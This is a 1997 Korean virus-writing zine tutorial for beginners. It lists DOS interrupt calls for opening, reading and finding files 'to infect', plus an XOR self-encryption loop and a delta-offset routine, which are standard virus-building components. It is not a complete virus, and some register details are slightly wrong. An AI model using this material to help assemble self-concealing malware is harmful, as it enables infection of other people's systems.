
 중요한 인터럽트 함수                                      CVC #02  97/09

---------------------------------------------------------------------------->

저는 많은 사람들이 바이러스 프로그램을 배우기를 원하는것을 알앗다
그래서 나는 초보자들을 위해 바이러스를 만드는데 필요한 인터럽트를
설명하고자 합니다

시     작
~~~~~~~~~

파일 열기:

        ah      =       3dh
        al      =       0-2     접근 모드
                        000 =   읽기만 가능
                        001 =   쓰기만 가능
                        010 =   읽기 쓰기 가능
        DS:DX = 세그먼트:옵셋

CF = 0 ;함수 성공
AX = 파일핸들
CF = 1 ;실책


파일 닫기:

        ax      =       3eh
        bx      =       파일핸들

CF = 0 ;함수가 성공했음
AX = 파괴 되었음
CF = 1 ;실책


파일읽기:

        ah      =       3fh
        bx      =       파일핸들
        cx      =       읽을 바이트 수
        DS:DX   =       버퍼 세그먼트:옵셋

CF = 0 : 함수 호출 성공
AX = 읽을 바이트 수
CF = 1 ;실책


첫번째로 감염시킬 파일 찾기:

        ah      =       4eh
        cx      =       파일 속성
                        bit 0 = 1 읽기만 가능
                        bit 1 = 1 숨김
                        bit 2 = 1 시스템
                        bit 3 = 1 볼륨 레이블
                        bit 4 = 1 디렉토리
                        bit 5 = 1 보통
                        bit 6-15  보류  
        DS:DX = 아스키즈의 페스 이름 세그먼트:옵셋


CF = 0 ;함수 호출 성공
[DTA] 디스크 전송 영역= 첫번째 데이타 블럭


다음 찾기:
        mov     ah      =       4fh     ;나머지는 위와 똑 같다



THE DTA
~~~~~~~

0       21      보류
21      1       파일 속성
22      2       마지막 수정 시간
24      2       마지막 수정 날짜
26      4       파일크기 (바이트 단위)
30      13      파일이름 (아스키즈)


중요한 함수:

XOR로 암호화 하는법:
~~~~~~~~~~~~~~

encypt_val      dw      ?


decrypt:
encrypt:
        mov     dx, word ptr [bp+encrypt_val]
        lea     bx, [bp+part_to_encrypt_start]
        mov     cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2

xor_loop:
        xor     word ptr [bx], dx
        add     bx, 2
        loop    xor_loop

;위의 루틴을 사용하려면 offset calculate 가 있어야 합니다


OFFSET CALCULATOR
~~~~~~~~~~~~~~~~~

Setup:
        pop si                  
        sub si, offset setup    
                                


나는 이것이 당신이 바이러스를 만드는데 도움이 되었으면 합니다
다음호에도 초보자을 위한 강의를 계속 할 작정입니다. 

                                                Dark Night
